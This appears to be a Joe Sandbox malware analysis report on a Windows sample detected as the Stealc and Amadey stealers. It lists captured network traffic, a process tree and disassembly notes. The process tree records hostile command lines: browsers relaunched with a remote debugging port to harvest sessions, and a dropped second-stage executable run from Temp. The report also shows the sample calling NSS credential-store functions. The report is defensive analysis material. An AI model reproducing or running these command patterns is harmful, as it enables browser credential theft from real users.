2024-11-25 23:25:57 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:57 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:57 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 8c2ab893-e01e-0003-5391-3f0fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232557Z-174f7845968v75bwhC1EWRuqen0000000fe00000000005z5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:57 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.6	49941	51.104.15.253	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:57 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577154627&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9552 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1; msnup=
2024-11-25 23:25:57 UTC	9552	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 35 54 32 33 3a 32 35 3a 35 34 2e 36 32 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 33 61 37 61 62 31 2d 35 63 61 37 2d 34 62 36 31 2d 39 66 36 64 2d 38 33 30 63 62 61 61 61 33 38 34 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 37 38 38 37 33 38 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-25T23:25:54.626Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"b83a7ab1-5ca7-4b61-9f6d-830cbaaa384c","epoch":"2078873817"},"app":{"loc
2024-11-25 23:25:58 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=0b7ad35a76814040b9bbcad86a0336b4&HASH=0b7a&LV=202411&V=4&LU=1732577157938; Domain=.microsoft.com; Expires=Tue, 25 Nov 2025 23:25:57 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=42abbb93cf414c6ca17ccb298e6aed24; Domain=.microsoft.com; Expires=Mon, 25 Nov 2024 23:55:57 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3311 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 25 Nov 2024 23:25:57 GMT Connection: close

Target ID:	0
Start time:	18:25:07
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf0000
File size:	1'795'584 bytes
MD5 hash:	AE62896AAC2820EBE9235B01B2370128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2719068067.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2160777148.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:25:18
Start date:	25/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:25:18
Start date:	25/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16016120249375417697,2229644558360442611,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:25:29
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:25:29
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2264,i,13353248291220899786,2148692624632142094,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:25:29
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:25:30
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2740 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	18:25:34
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6440 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:25:34
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6604 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:25:35
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Imagebase:	0x7ff6f2da0000
File size:	1'255'976 bytes
MD5 hash:	F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:25:35
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Imagebase:	0x7ff6f2da0000
File size:	1'255'976 bytes
MD5 hash:	F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:25:58
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDBKKKEHDHC.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:25:58
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:25:58
Start date:	25/11/2024
Path:	C:\Users\user\DocumentsDBKKKEHDHC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsDBKKKEHDHC.exe"
Imagebase:	0xa70000
File size:	1'951'744 bytes
MD5 hash:	60345799039B0C985D836024C003B152
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000003.2672554775.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.2714825632.0000000000A71000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:26:02
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xa60000
File size:	1'951'744 bytes
MD5 hash:	60345799039B0C985D836024C003B152
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000003.2708124358.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.2748369916.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:26:30
Start date:	25/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6028 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	18:27:00
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7ff605720000
File size:	1'951'744 bytes
MD5 hash:	60345799039B0C985D836024C003B152
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.3409408672.0000000000A61000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000003.3282486940.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 6CAB6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CC02120,6CAB7E60), ref: 6CAB6EBC
TlsGetValue.KERNEL32 ref: 6CAB6EDF
EnterCriticalSection.KERNEL32(?), ref: 6CAB6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CAB6F25

Part of subcall function 6CA8A900: TlsGetValue.KERNEL32(00000000,?,6CC014E4,?,6CA24DD9), ref: 6CA8A90F
Part of subcall function 6CA8A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA8A94F

PR_Unlock.NSS3 ref: 6CAB6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CAB6FA9
TlsGetValue.KERNEL32 ref: 6CAB70B4
EnterCriticalSection.KERNEL32(?), ref: 6CAB70C8
PR_CallOnce.NSS3(6CC024C0,6CAF7590), ref: 6CAB7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAB7117
SECOID_Init.NSS3 ref: 6CAB7128
PORT_Alloc_Util.NSS3(00000057), ref: 6CAB714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB71A9
PR_NotifyAllCondVar.NSS3 ref: 6CAB71CF
PR_Unlock.NSS3 ref: 6CAB71DD
free.MOZGLUE(?), ref: 6CAB71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAB7208
free.MOZGLUE(00000000), ref: 6CAB7221
free.MOZGLUE(00000001), ref: 6CAB7235
TlsGetValue.KERNEL32 ref: 6CAB724A
EnterCriticalSection.KERNEL32(?), ref: 6CAB725E
PR_NotifyCondVar.NSS3 ref: 6CAB7273
PR_Unlock.NSS3 ref: 6CAB7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CAB7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CBF0148,,defaultModDB,internalKeySlot), ref: 6CAB74CC
free.MOZGLUE(00000000), ref: 6CAB7513
free.MOZGLUE(00000000), ref: 6CAB751B
free.MOZGLUE(00000000), ref: 6CAB7528
free.MOZGLUE(00000000), ref: 6CAB753C
free.MOZGLUE(00000000), ref: 6CAB7550
free.MOZGLUE(00000000), ref: 6CAB7561
free.MOZGLUE(00000000), ref: 6CAB7572
free.MOZGLUE(00000000), ref: 6CAB7583
free.MOZGLUE(00000000), ref: 6CAB7594
free.MOZGLUE(00000000), ref: 6CAB75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CAB75BD
free.MOZGLUE(00000000), ref: 6CAB75C8
free.MOZGLUE(00000000), ref: 6CAB75F1
PR_NewLock.NSS3 ref: 6CAB7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CAB7686
PR_NewLock.NSS3 ref: 6CAB76A2

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CAB76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CAB7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CAB771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CAB7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CAB774A
DeleteCriticalSection.KERNEL32(?), ref: 6CAB7770
free.MOZGLUE(?), ref: 6CAB7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CAB77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAB77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CAB7821
PORT_Alloc_Util.NSS3(?), ref: 6CAB7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAB785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CAB786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CAB78AC
free.MOZGLUE(00000000), ref: 6CAB78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CAB78F3
free.MOZGLUE(00000000), ref: 6CAB78FC
free.MOZGLUE(00000000), ref: 6CAB791C

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

Strings

dbm:, xrefs: 6CAB7716
kbi., xrefs: 6CAB7886
extern:, xrefs: 6CAB772B
sql:, xrefs: 6CAB76FE
Spac, xrefs: 6CAB7389
NSS Internal Module, xrefs: 6CAB74A2, 6CAB74C6
rdb:, xrefs: 6CAB7744
,defaultModDB,internalKeySlot, xrefs: 6CAB748D, 6CAB74AA
dll, xrefs: 6CAB788E
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CAB74C7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 151fc24724f51bc8281bf2c100d78dd0c734fc5ef6ce5baedac674ea53882293
Instruction ID: 0f89c0580ac3150109cf1c7af2fa96b02409b8a18406d6450e6018690e1cb92e
Opcode Fuzzy Hash: 151fc24724f51bc8281bf2c100d78dd0c734fc5ef6ce5baedac674ea53882293
Instruction Fuzzy Hash: D352F2B1E012419BEF118F64DC057AE7BB8AF05308F194128ED19F7B51EBB1D998CBA1

Function 6CADBFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6CADC0C8

Part of subcall function 6CB69440: LeaveCriticalSection.KERNEL32 ref: 6CB695CD
Part of subcall function 6CB69440: TlsGetValue.KERNEL32 ref: 6CB69622
Part of subcall function 6CB69440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6CB6964E

PR_EnterMonitor.NSS3 ref: 6CADC0AE

Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB691AA
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69212
Part of subcall function 6CB69090: _PR_MD_WAIT_CV.NSS3 ref: 6CB6926B

Part of subcall function 6CA90600: GetLastError.KERNEL32(?,?,?,?,?,6CA905E2), ref: 6CA90642
Part of subcall function 6CA90600: TlsGetValue.KERNEL32(?,?,?,?,?,6CA905E2), ref: 6CA9065D
Part of subcall function 6CA90600: GetLastError.KERNEL32 ref: 6CA90678
Part of subcall function 6CA90600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6CA9068A
Part of subcall function 6CA90600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA90693
Part of subcall function 6CA90600: PR_SetErrorText.NSS3(00000000,?), ref: 6CA9069D
Part of subcall function 6CA90600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,8771BE33,?,?,?,?,?,6CA905E2), ref: 6CA906CA
Part of subcall function 6CA90600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6CA905E2), ref: 6CA906E6

PR_EnterMonitor.NSS3 ref: 6CADC0F2
PR_ExitMonitor.NSS3 ref: 6CADC10E
PR_ExitMonitor.NSS3 ref: 6CADC081

Part of subcall function 6CB69440: TlsGetValue.KERNEL32 ref: 6CB6945B
Part of subcall function 6CB69440: TlsGetValue.KERNEL32 ref: 6CB69479
Part of subcall function 6CB69440: EnterCriticalSection.KERNEL32 ref: 6CB69495
Part of subcall function 6CB69440: TlsGetValue.KERNEL32 ref: 6CB694E4
Part of subcall function 6CB69440: TlsGetValue.KERNEL32 ref: 6CB69532
Part of subcall function 6CB69440: LeaveCriticalSection.KERNEL32 ref: 6CB6955D

PR_EnterMonitor.NSS3 ref: 6CADC068

